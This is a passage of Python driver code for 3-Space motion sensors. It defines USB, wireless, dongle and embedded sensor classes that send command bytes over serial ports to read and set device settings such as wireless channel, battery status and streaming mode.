fail_byte, t_stamp, data = self.writeRead('getSleepMode')
if timestamp:
return (data, t_stamp)
return data
## 240(0xf0)
def setJoystickEnabled(self, enabled, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setJoystickEnabled', enabled)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 241(0xf1)
def setMouseEnabled(self, enabled, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setMouseEnabled', enabled)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 242(0xf2)
def getJoystickEnabled(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getJoystickEnabled')
if timestamp:
return (data, t_stamp)
return data
## 243(0xf3)
def getMouseEnabled(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getMouseEnabled')
if timestamp:
return (data, t_stamp)
return data
## 244(0xf4)
def setControlMode(self, control_class, control_index, handler_index, timestamp=False):
arg_list = (control_class, control_index, handler_index)
fail_byte, t_stamp, data = self.writeRead('setControlMode', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 245(0xf5)
def setControlData(self, control_class, control_index, data_point_index, data_point, timestamp=False):
arg_list = (control_class, control_index, data_point_index, data_point)
fail_byte, t_stamp, data = self.writeRead('setControlData', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 246(0xf6)
def getControlMode(self, control_class, control_index, timestamp=False):
arg_list = (control_class, control_index)
fail_byte, t_stamp, data = self.writeRead('getControlMode', arg_list)
if timestamp:
return (data, t_stamp)
return data
## 247(0xf7)
def getControlData(self, control_class, control_index, handler_index, timestamp=False):
arg_list = (control_class, control_index, handler_index)
fail_byte, t_stamp, data = self.writeRead('getControlData', arg_list)
if timestamp:
return (data, t_stamp)
return data
## 251(0xfb)
def setMouseAbsoluteRelativeMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setMouseAbsoluteRelativeMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 252(0xfc)
def getMouseAbsoluteRelativeMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getMouseAbsoluteRelativeMode')
if timestamp:
return (data, t_stamp)
return data
## END generated functions USB and WL_ and EM_ and DL_ and BT_
class TSUSBSensor(_TSSensor):
command_dict = _TSSensor.command_dict.copy()
command_dict.update({
'_setUARTBaudRate': (0xe7, 0, None, 4, '>I', 1),
'getUARTBaudRate': (0xe8, 4, '>I', 0, None, 1),
'getButtonState': (0xfa, 1, '>B', 0, None, 1)
})
reverse_command_dict = dict(map(lambda x: [x[1][0], x[0]], command_dict.items()))
_device_types = ["USB", "USB-HH", "MUSB", "MUSB-HH", "USBWT", "USBWT-HH"]
def __new__(cls, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
if com_port is None:
return None
if com_port:
if type(com_port) is str:
port_name = com_port
elif type(com_port) is ComInfo:
port_name = com_port.com_port
else:
_print("An erronous parameter was passed in")
return None
if baudrate not in _allowed_baudrates:
baudrate = _baudrate
_print("Error baudrate value not allowed. Using default.")
serial_port = serial.Serial(port_name, baudrate=baudrate, timeout=0.5, writeTimeout=0.5)
if serial_port is not None:
new_inst = super(_TSSensor, cls).__new__(cls)
serial_port.write(bytearray((0xf7, 0x56, 0x56)))
time.sleep(0.01)
serial_port.flushInput()
return _generateSensorClass(new_inst, serial_port, TSUSBSensor._device_types)
_print('Error serial port was not made')
## 231(0xe7)
def setUARTBaudRate(self, baud_rate, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('_setUARTBaudRate', baud_rate)
if not fail_byte:
self.baudrate = baud_rate
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## generated functions USB
## 232(0xe8)
def getUARTBaudRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUARTBaudRate')
if timestamp:
return (data, t_stamp)
return data
## 250(0xfa)
def getButtonState(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getButtonState')
if timestamp:
return (data, t_stamp)
return data
## END generated functions USB
class TSWLSensor(_TSSensor):
command_dict = _TSSensor.command_dict.copy()
command_dict.update({
'_getWirelessPanID': (0xc0, 2, '>H', 0, None, 1),
'_setWirelessPanID': (0xc1, 0, None, 2, '>H', 1),
'_getWirelessChannel': (0xc2, 1, '>B', 0, None, 1),
'_setWirelessChannel': (0xc3, 0, None, 1, '>B', 1),
'commitWirelessSettings': (0xc5, 0, None, 0, None, 1),
'getWirelessAddress': (0xc6, 2, '>H', 0, None, 1),
'getBatteryVoltage': (0xc9, 4, '>f', 0, None, 1),
'getBatteryPercentRemaining': (0xca, 1, '>B', 0, None, 1),
'getBatteryStatus': (0xcb, 1, '>B', 0, None, 1),
'getButtonState': (0xfa, 1, '>B', 0, None, 1)
})
reverse_command_dict = dict(map(lambda x: [x[1][0], x[0]], command_dict.items()))
_device_types = ["WL", "WL-HH"]
def __new__(cls, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR, logical_id=None, dongle=None):
if com_port is None and logical_id is None and dongle is None:
return None
if com_port:
if type(com_port) is str:
port_name = com_port
elif type(com_port) is ComInfo:
port_name = com_port.com_port
else:
_print("An erronous parameter was passed in")
return None
if baudrate not in _allowed_baudrates:
baudrate = _baudrate
_print("Error baudrate value not allowed. Using default.")
serial_port = serial.Serial(port_name, baudrate=baudrate, timeout=0.5, writeTimeout=0.5)
if serial_port is not None:
new_inst = super(_TSSensor, cls).__new__(cls)
new_inst.dongle = None
new_inst.logical_id = None
serial_port.write(bytearray((0xf7, 0x56, 0x56)))
time.sleep(0.01)
serial_port.flushInput()
return _generateSensorClass(new_inst, serial_port, TSWLSensor._device_types)
_print('Error serial port was not made')
if logical_id is not None and dongle:
for tries in range(_wireless_retries + 1):
fail_byte, timestamp, serial_number = dongle.faWriteRead(logical_id, 'getSerialNumber')
if not fail_byte:
if serial_number in global_sensorlist:
rtn_inst = global_sensorlist[serial_number]
if rtn_inst.dongle:
_print("sensor was already paired before")
pass
rtn_inst.dongle = dongle
rtn_inst.logical_id = logical_id
dongle.wireless_table[logical_id] = serial_number
rtn_inst.switchToWirelessMode()
return rtn_inst
else:
new_inst = super(_TSSensor, cls).__new__(cls)
for tries in range(_wireless_retries + 1):
fail_byte, timestamp, hardware_version = dongle.faWriteRead(logical_id, 'getHardwareVersionString')
if not fail_byte:
new_inst.device_type = convertString(hardware_version)[4:-8].strip()
break
else:
new_inst.device_type = "WL"
new_inst.dongle = dongle
new_inst.logical_id = logical_id
new_inst.port_name = ""
new_inst.serial_port_settings = {}
new_inst.serial_port = None
new_inst.switchToWirelessMode()
new_inst.serial_number = serial_number
global_sensorlist[serial_number] = new_inst
return new_inst
_print("raise wireless fail error here")
return None
_print('this sould never happen')
return None
def __init__(self, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR, logical_id=None, dongle=None):
self.protocol_args = { 'success_failure': True,
'timestamp': True,
'command_echo': True,
'data_length': True}
if timestamp_mode != TSS_TIMESTAMP_SENSOR:
self.protocol_args['timestamp'] = False
self.timestamp_mode = timestamp_mode
self.baudrate = baudrate
reinit = False
try: # if this is set the class had been there before
check = self.stream_parse
reinit = True
# _print("sensor reinit!!!")
except:
self._setupBaseVariables()
self.callback_func = None
if self.serial_port and not self.data_loop:
self._setupProtocolHeader(**self.protocol_args)
self._setupThreadedReadLoop()
self.latest_lock = threading.Condition(threading.Lock())
self.new_data = False
if reinit:
if self.stream_timing is not None:
self.setStreamingTiming(*self.stream_timing)
if self.stream_slot_cmds is not None:
self.setStreamingSlots(*self.stream_slot_cmds)
def close(self):
if self.serial_port is not None:
super(TSWLSensor, self).close()
def _wirlessWriteRead(self, command, input_list=None):
result = (True, None, None)
for i in range(_wireless_retries + 1):
result = self.dongle.faWriteRead(self.logical_id, command, input_list)
if not result[0]:
break
return result
def switchToWirelessMode(self):
if self.dongle and self.logical_id is not None:
self.writeRead = self._wirlessWriteRead
self.wireless_com = True
return True
return False
def switchToWiredMode(self):
if self.serial_port:
self.writeRead = self.f9WriteRead
self.wireless_com = False
return True
return False
## 192(0xc0)
def getWirelessPanID(self, timestamp=False):
t_stamp = None
data = None
fail_byte, t_stamp, data = self.writeRead('_getWirelessPanID')
if timestamp:
return (data, t_stamp)
return data
## 193(0xc1)
def setWirelessPanID(self, PanID, timestamp=False):
t_stamp = None
fail_byte = True
if not self.wireless_com:
fail_byte, t_stamp, data = self.writeRead('_setWirelessPanID', PanID)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 194(0xc2)
def getWirelessChannel(self, timestamp=False):
t_stamp = None
data = None
fail_byte, t_stamp, data = self.writeRead('_getWirelessChannel')
if timestamp:
return (data, t_stamp)
return data
## 195(0xc3)
def setWirelessChannel(self, channel, timestamp=False):
t_stamp = None
fail_byte = True
if not self.wireless_com:
fail_byte, t_stamp, data = self.writeRead('_setWirelessChannel', channel)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## generated functions WL_
## 197(0xc5)
def commitWirelessSettings(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('commitWirelessSettings')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 198(0xc6)
def getWirelessAddress(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessAddress')
if timestamp:
return (data, t_stamp)
return data
## 201(0xc9)
def getBatteryVoltage(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryVoltage')
if timestamp:
return (data, t_stamp)
return data
## 202(0xca)
def getBatteryPercentRemaining(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryPercentRemaining')
if timestamp:
return (data, t_stamp)
return data
## 203(0xcb)
def getBatteryStatus(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryStatus')
if timestamp:
return (data, t_stamp)
return data
## 250(0xfa)
def getButtonState(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getButtonState')
if timestamp:
return (data, t_stamp)
return data
## END generated functions WL_
class TSDongle(_TSBase):
command_dict = _TSBase.command_dict.copy()
command_dict.update({
'setWirelessStreamingAutoFlushMode': (0xb0, 0, None, 1, '>B', 1),
'getWirelessStreamingAutoFlushMode': (0xb1, 1, '>B', 0, None, 1),
'_setWirelessStreamingManualFlushBitfield': (0xb2, 0, None, 2, '>H', 1),
'_getWirelessStreamingManualFlushBitfield': (0xb3, 2, '>H', 0, None, 1),
'_getManualFlushSingle': (0xb4, 0, None, 1, '>B', 1),
'_getManualFlushBulk': (0xb5, 0, None, 0, None, 1),
'broadcastSynchronizationPulse': (0xb6, 0, None, 0, None, 1),
'getReceptionBitfield': (0xb7, 2, '>H', 0, None, 1),
'getWirelessPanID': (0xc0, 2, '>H', 0, None, 1),
'setWirelessPanID': (0xc1, 0, None, 2, '>H', 1),
'getWirelessChannel': (0xc2, 1, '>B', 0, None, 1),
'setWirelessChannel': (0xc3, 0, None, 1, '>B', 1),
'commitWirelessSettings': (0xc5, 0, None, 0, None, 1),
'getWirelessAddress': (0xc6, 2, '>H', 0, None, 1),
'getSerialNumberAtLogicalID': (0xd0, 4, '>I', 1, '>B', 1),
'_setSerialNumberAtLogicalID': (0xd1, 0, None, 5, '>BI', 1),
'getWirelessChannelNoiseLevels': (0xd2, 16, '>16B', 0, None, 1),
'setWirelessRetries': (0xd3, 0, None, 1, '>B', 1),
'getWirelessRetries': (0xd4, 1, '>B', 0, None, 1),
'getWirelessSlotsOpen': (0xd5, 1, '>B', 0, None, 1),
'getSignalStrength': (0xd6, 1, '>B', 0, None, 1),
'setWirelessHIDUpdateRate': (0xd7, 0, None, 1, '>B', 1),
'getWirelessHIDUpdateRate': (0xd8, 1, '>B', 0, None, 1),
'setWirelessHIDAsynchronousMode': (0xd9, 0, None, 1, '>B', 1),
'getWirelessHIDAsynchronousMode': (0xda, 1, '>B', 0, None, 1),
'_setWirelessResponseHeaderBitfield': (0xdb, 0, None, 4, '>I', 1),
'_getWirelessResponseHeaderBitfield': (0xdc, 4, '>I', 0, None, 1),
'setJoystickLogicalID': (0xf0, 0, None, 1, '>B', 1),
'setMouseLogicalID': (0xf1, 0, None, 1, '>B', 1),
'getJoystickLogicalID': (0xf2, 1, '>B', 0, None, 1),
'getMouseLogicalID': (0xf3, 1, '>B', 0, None, 1)
})
wl_command_dict = TSWLSensor.command_dict.copy()
_device_types = ["DNG"]
def __new__(cls, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
if com_port:
if type(com_port) is str:
port_name = com_port
elif type(com_port) is ComInfo:
port_name = com_port.com_port
else:
_print("An erronous parameter was passed in")
return None
if baudrate not in _allowed_baudrates:
baudrate = _baudrate
_print("Error baudrate value not allowed. Using default.")
serial_port = serial.Serial(port_name, baudrate=baudrate, timeout=0.5, writeTimeout=0.5)
if serial_port is not None:
new_inst = super(TSDongle, cls).__new__(cls)
serial_port.write(bytearray((0xf7, 0x56, 0x56)))
time.sleep(0.05)
serial_port.flushInput()
checkSoftwareVersionFromPort(serial_port)
serial_port.write(bytearray((0xf7, 0xb7, 0xb7)))
reception_bitfield = struct.unpack('>H', serial_port.read(2))[0]
idx = 1
for i in range(15):
if idx & reception_bitfield:
count = 0
serial_port.write(bytearray((0xf7, 0xd0, i, 0xd0 + i)))
wl_id = struct.unpack('>I', serial_port.read(4))[0]
while count < 15:
count += 1
serial_port.write(bytearray((0xf8, i, 0x56, 0x56 + i)))
did_fail = struct.unpack('>B', serial_port.read(1))[0]
if did_fail:
serial_port.read(1)
else:
_print("Stopped {0:08X} on try {1:d}".format(wl_id, count))
serial_port.read(2)
break
idx <<= 1
return _generateSensorClass(new_inst, serial_port, TSDongle._device_types)
_print('Error serial port was not made')
def __init__(self, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
self.protocol_args = { 'success_failure': True,
'timestamp': True,
'command_echo': True,
'logical_id': True,
'data_length': True}
if timestamp_mode != TSS_TIMESTAMP_SENSOR:
self.protocol_args['timestamp'] = False
self.timestamp_mode = timestamp_mode
self.baudrate = baudrate
reinit = False
try: # if this is set the class had been there before
check = self.wireless_table
reinit = True
# _print("sensor reinit!!!")
except:
self._setupBaseVariables()
self._setupProtocolHeader(**self.protocol_args)
self._setupThreadedReadLoop()
self.setWirelessStreamingAutoFlushMode(1)
self.startStreaming()
def reconnect(self):
self.close()
if not tryPort(self.port_name):
_print("tryport fail")
try:
serial_port = serial.Serial(self.port_name, baudrate=self.baudrate, timeout=0.5, writeTimeout=0.5)
serial_port.applySettingsDict(self.serial_port_settings)
self.serial_port = serial_port
self.setWirelessStreamingAutoFlushMode(0)
time.sleep(0.05)
self.serial_port.flushInput()
for i in range(15):
serial_port.write(bytearray((0xf7, 0xd0, i, 0xd0 + i)))
for i in range(10):
try:
wl_id = struct.unpack('>I', serial_port.read(4))[0]
except:
continue
break
if wl_id != 0:
count = 0
while count < 25:
count += 1
serial_port.write(bytearray((0xf8, i, 0x56, 0x56 + i)))
did_fail = struct.unpack('>B', serial_port.read(1))[0]
if did_fail:
serial_port.read(1)
else:
_print("Stopped {0:08X} on try {1:d}".format(wl_id, count))
serial_port.read(2)
break
except:
traceback.print_exc()
return False
self._setupProtocolHeader(**self.protocol_args)
self._setupThreadedReadLoop()
self.setWirelessStreamingAutoFlushMode(1)
return True
def _setupBaseVariables(self):
self.serial_number_hex = '{0:08X}'.format(self.serial_number)
self.wireless_table = [0] * 15
for i in range(15):
tmp_id = self.f7WriteRead('getSerialNumberAtLogicalID', i)
if tmp_id not in self.wireless_table or tmp_id == 0:
self.wireless_table[i] = tmp_id
else:
self.f7WriteRead('_setSerialNumberAtLogicalID', (i, 0))
def _setupProtocolHeader(self, success_failure=False,
timestamp=False,
command_echo=False,
checksum=False,
logical_id=False,
serial_number=False,
data_length=False):
protocol_header =_generateProtocolHeader( success_failure,
timestamp,
command_echo,
checksum,
logical_id,
serial_number,
data_length)
protocol_byte, self.header_parse, self.header_idx_lst = protocol_header
d_header = self.f7WriteRead('_getWiredResponseHeaderBitfield')
dwl_header = self.f7WriteRead('_getWirelessResponseHeaderBitfield')
if d_header != protocol_byte or dwl_header != protocol_byte:
self.f7WriteRead('_setWiredResponseHeaderBitfield', protocol_byte)
self.f7WriteRead('_setWirelessResponseHeaderBitfield', protocol_byte)
d_header = self.f7WriteRead('_getWiredResponseHeaderBitfield')
dwl_header = self.f7WriteRead('_getWirelessResponseHeaderBitfield')
if d_header != protocol_byte or dwl_header != protocol_byte:
print("!!!!!fail d_header={0}, dwl_header={1}, protocol_header_byte={2}".format(d_header, dwl_header, protocol_byte))
raise Exception
# Wireless Old Protocol WriteRead
def f8WriteRead(self, logical_id, command, input_list=None):
command_args = self.command_dict[command]
cmd_byte, out_len, out_struct, in_len, in_struct, compatibility = command_args
packed_data = None
if in_struct:
if type(input_list) in (list, tuple):
packed_data = struct.pack(in_struct, *input_list)
else:
packed_data = struct.pack(in_struct, input_list)
write_array = makeWriteArray(0xf8, logical_id, cmd_byte, packed_data)
self.serial_port.write(write_array)
rtn_list = []
output_data = self.serial_port.read(2)
if len(output_data) == 2:
fail_byte = struct.unpack('>B', output_data[0])[0]
logical_id_byte = struct.unpack('>B', output_data[1])[0]
rtn_list.append(fail_byte)
if not fail_byte:
self.serial_port.read(1)
else:
return True
if out_struct:
output_data = self.serial_port.read(out_len)
rtn_list.append(struct.unpack(out_struct, output_data))
if len(rtn_list) != 1:
return rtn_list
return rtn_list[0]
return True
## Wireless New Protocol WriteRead
def faWriteRead(self, logical_id, command, input_list=None):
global global_counter
command_args = self.wl_command_dict[command]
cmd_byte, out_len, out_struct, in_len, in_struct, compatibility = command_args
if self.compatibility < compatibility:
raise Exception("Firmware for device on ( %s ) is out of date for this function. Recommend updating to latest firmware." % self.serial_port.name)
packed_data = None
if in_struct:
if type(input_list) in (list, tuple):
packed_data=struct.pack(in_struct, *input_list)
else:
packed_data=struct.pack(in_struct, input_list)
write_array = makeWriteArray(0xfa, logical_id, cmd_byte, packed_data)
while len(self.read_queue) > 15:
_print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!too many commands!!!!!")
time.sleep(0.01)
self.read_lock.acquire()
uid = global_counter
global_counter += 1
try:
self.serial_port.write(write_array) # release in reader thread
except serial.SerialTimeoutException:
self.read_lock.release()
self.serial_port.close()
# _print("SerialTimeoutException!!!!")
return (True, None, None)
except ValueError:
try:
# _print("trying to open it back up!!!!")
self.serial_port.open()
# _print("aaand open!!!!")
except serial.SerialException:
self.read_lock.release()
# _print("SerialTimeoutException!!!!")
return (True, None, None)
queue_packet = (uid, cmd_byte)
timeout_time = 0.5 + (len(self.read_queue) * 0.150) # timeout increases as queue gets larger
self.read_queue.append(queue_packet)
start_time = time.clock() + timeout_time
read_data = None
while(timeout_time > 0):
self.read_lock.wait(timeout_time)
read_data = self.read_dict.get(uid, None)
if read_data is not None:
break
timeout_time =start_time -time.clock()
# _print("Still waiting {0} {1} {2} {3}".format(uid, command,logical_id, timeout_time))
else:
# _print("Operation timed out!!!!")
try:
self.read_queue.remove(queue_packet)
except:
traceback.print_exc()
self.read_lock.release()
return (True, None, None)
self.read_lock.release()
del self.read_dict[uid]
header_list, output_data = read_data
fail_byte, timestamp, cmd_echo, ck_sum, rtn_log_id, sn, data_size = header_list
# _print("RESponse {0} {1} {2} {3}".format(uid, command,logical_id, timeout_time))
if logical_id != rtn_log_id:
# _print("!!!!!!!!logical_id != rtn_log_id!!!!!")
# _print(header_list)
# _hexDump(output_data, 'o')
# _print('!!!!!inWaiting = {0}'.format(self.serial_port.inWaiting()))
return (True, timestamp, None)
if cmd_echo != cmd_byte:
# _print("!!!!!!!!cmd_echo!=cmd_byte!!!!!")
# _print('cmd_echo= 0x{0:02x} cmd_byte= 0x{1:02x}'.format(cmd_echo, cmd_byte))
# _print(header_list)
# _hexDump(output_data, 'o')
# _print('!!!!!inWaiting = {0}'.format(self.serial_port.inWaiting()))
# _print('!!!!!!end')
return (True, timestamp, None)
rtn_list = None
if not fail_byte:
if out_struct:
rtn_list = struct.unpack(out_struct, output_data)
if len(rtn_list) == 1:
rtn_list = rtn_list[0]
elif cmd_echo == 0x54:
rtn_list = self[logical_id].stream_parse.unpack(output_data)
if len(rtn_list) == 1:
rtn_list = rtn_list[0]
else:
# _print("fail_byte!!!!triggered")
pass
self._read_data = None
return (fail_byte, timestamp, rtn_list)
def __getitem__(self, idx):
hw_id = self.wireless_table[idx]
if hw_id == 0:
return None
# Check if sensor exists.
if hw_id in global_sensorlist:
rtn_inst = global_sensorlist[hw_id]
if rtn_inst.dongle is self:
return rtn_inst
elif rtn_inst.dongle is None:
_print("updating sensor {0:08X} to be wireless".format(hw_id))
return TSWLSensor(timestamp_mode=self.timestamp_mode, dongle=self, logical_id=idx)
return None
# Else, make a new TSWLSensor
else:
_print("making new sensor {0:08X}".format(hw_id))
return TSWLSensor(timestamp_mode=self.timestamp_mode, dongle=self, logical_id=idx)
def getSensorFromDongle(self, idx):
return self.__getitem__(idx)
def setSensorToDongle(self, idx, hw_id):
other_hw_id = self.wireless_table[idx]
if other_hw_id != 0:
if other_hw_id in global_sensorlist:
other_sens = global_sensorlist[other_hw_id]
other_sens.dongle = None
other_sens.logical_id = None
if hw_id not in self.wireless_table:
if hw_id in global_sensorlist:
sensor = global_sensorlist[hw_id]
sensor.dongle = None
sensor.logical_id = None
self.setSerialNumberAtLogicalID(idx, hw_id)
else:
if other_hw_id != hw_id:
other_idx = self.wireless_table.index(hw_id)
self.setSerialNumberAtLogicalID(other_idx, 0)
self.setSerialNumberAtLogicalID(idx, hw_id)
return self.__getitem__(idx)
elif hw_id != 0:
self.setSerialNumberAtLogicalID(idx, hw_id)
return self.__getitem__(idx)
def _dataReadLoop(self):
while self.data_loop:
try:
self._readDataWirelessProHeader()
except(KeyboardInterrupt):
print('\n! Received keyboard interrupt, quitting threads.\n')
raise KeyboardInterrupt # fix bug where a thread eats the interupt
break
except:
# traceback.print_exc()
# _print("bad _parseStreamData parse")
# _print('!!!!!inWaiting = {0}'.format(self.serial_port.inWaiting()))
try:
self.read_lock.release()
except:
pass
def _readDataWirelessProHeader(self):
_serial_port = self.serial_port
# in_wait = _serial_port.inWaiting()
# if in_wait:
# _print('!1025! inWaiting = {0}'.format(in_wait))
header_bytes = _serial_port.read(self.header_parse.size)
if header_bytes:
# _hexDump(header_bytes, 'o')
if self.timestamp_mode == TSS_TIMESTAMP_SENSOR:
header_data = self.header_parse.unpack(header_bytes)
header_list = padProtocolHeader87(header_data)
elif self.timestamp_mode == TSS_TIMESTAMP_SYSTEM:
sys_timestamp = time.clock() # time packet was parsed it might been in the system buffer a few ms
sys_timestamp *= 1000000
header_data = self.header_parse.unpack(header_bytes)
header_list = padProtocolHeader85(header_data, sys_timestamp)
else:
header_data = self.header_parse.unpack(header_bytes)
header_list = padProtocolHeader85(header_data, None)
fail_byte, timestamp, cmd_echo, ck_sum, rtn_log_id, sn, data_size = header_list
# _print("!!!!fail_byte={0}, cmd_echo={1}, rtn_log_id={2}, data_size={3}".format(fail_byte, cmd_echo, rtn_log_id, data_size))
output_data = _serial_port.read(data_size)
if cmd_echo is 0xff:
if data_size:
self[rtn_log_id]._parseStreamData(timestamp, output_data)
return
self.read_lock.acquire()
# _print('retrning data!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
if len(self.read_queue): # here for a bug in the code
uid, cmd_byte = self.read_queue.popleft()
if cmd_byte == cmd_echo:
self.read_dict[uid] = (header_list, output_data)
self.read_lock.notifyAll() # dies in 3 seconds if there is a writeRead in wait
else:
# _print('Unrequested packet found!!!')
# _hexDump(header_bytes, 'o')
# _hexDump(output_data, 'o')
self.read_queue.appendleft((uid, cmd_byte))
self.read_lock.release()
return
# _print('Unrequested packet found (read_queue is empty)!!!')
# _hexDump(header_bytes, 'o')
# _hexDump(output_data, 'o')
# _print("no status bytes")
self.read_lock.release()
## 209(0xd1)
def setSerialNumberAtLogicalID(self, logical_id, serial_number, timestamp=False):
arg_list = (logical_id, serial_number)
fail_byte, t_stamp, data = self.writeRead('_setSerialNumberAtLogicalID', arg_list)
if not fail_byte:
self.wireless_table[logical_id] = serial_number
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## generated functions DNG
## 176(0xb0)
def setWirelessStreamingAutoFlushMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setWirelessStreamingAutoFlushMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 177(0xb1)
def getWirelessStreamingAutoFlushMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessStreamingAutoFlushMode')
if timestamp:
return (data, t_stamp)
return data
## 182(0xb6)
def broadcastSynchronizationPulse(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('broadcastSynchronizationPulse')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 183(0xb7)
def getReceptionBitfield(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getReceptionBitfield')
if timestamp:
return (data, t_stamp)
return data
## 192(0xc0)
def getWirelessPanID(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessPanID')
if timestamp:
return (data, t_stamp)
return data
## 193(0xc1)
def setWirelessPanID(self, PanID, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setWirelessPanID', PanID)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 194(0xc2)
def getWirelessChannel(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessChannel')
if timestamp:
return (data, t_stamp)
return data
## 195(0xc3)
def setWirelessChannel(self, channel, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setWirelessChannel', channel)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 197(0xc5)
def commitWirelessSettings(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('commitWirelessSettings')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 198(0xc6)
def getWirelessAddress(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessAddress')
if timestamp:
return (data, t_stamp)
return data
## 208(0xd0)
def getSerialNumberAtLogicalID(self, logical_id, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getSerialNumberAtLogicalID', logical_id)
if timestamp:
return (data, t_stamp)
return data
## 210(0xd2)
def getWirelessChannelNoiseLevels(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessChannelNoiseLevels')
if timestamp:
return (data, t_stamp)
return data
## 211(0xd3)
def setWirelessRetries(self, retries, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setWirelessRetries', retries)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 212(0xd4)
def getWirelessRetries(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessRetries')
if timestamp:
return (data, t_stamp)
return data
## 213(0xd5)
def getWirelessSlotsOpen(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessSlotsOpen')
if timestamp:
return (data, t_stamp)
return data
## 214(0xd6)
def getSignalStrength(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getSignalStrength')
if timestamp:
return (data, t_stamp)
return data
## 215(0xd7)
def setWirelessHIDUpdateRate(self, update_rate, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setWirelessHIDUpdateRate', update_rate)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 216(0xd8)
def getWirelessHIDUpdateRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessHIDUpdateRate')
if timestamp:
return (data, t_stamp)
return data
## 217(0xd9)
def setWirelessHIDAsynchronousMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setWirelessHIDAsynchronousMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 218(0xda)
def getWirelessHIDAsynchronousMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessHIDAsynchronousMode')
if timestamp:
return (data, t_stamp)
return data
## 240(0xf0)
def setJoystickLogicalID(self, logical_id, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setJoystickLogicalID', logical_id)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 241(0xf1)
def setMouseLogicalID(self, logical_id, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setMouseLogicalID', logical_id)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 242(0xf2)
def getJoystickLogicalID(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getJoystickLogicalID')
if timestamp:
return (data, t_stamp)
return data
## 243(0xf3)
def getMouseLogicalID(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getMouseLogicalID')
if timestamp:
return (data, t_stamp)
return data
## END generated functions DNG
class TSEMSensor(_TSSensor):
command_dict = _TSSensor.command_dict.copy()
command_dict.update({
'setPinMode': (0x1d, 0, None, 2, '>BB', 1),
'getPinMode': (0x1e, 2, '>BB', 0, None, 1),
'getInterruptStatus': (0x1f, 1, '>B', 0, None, 1),
'_setUARTBaudRate': (0xe7, 0, None, 4, '>I', 1),
'getUARTBaudRate': (0xe8, 4, '>I', 0, None, 1)
})
reverse_command_dict = dict(map(lambda x: [x[1][0], x[0]], command_dict.items()))
_device_types = ["EM", "EM-HH"]
def __new__(cls, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
if com_port is None:
return None
if com_port:
if type(com_port) is str:
port_name = com_port
elif type(com_port) is ComInfo:
port_name = com_port.com_port
else:
_print("An erronous parameter was passed in")
return None
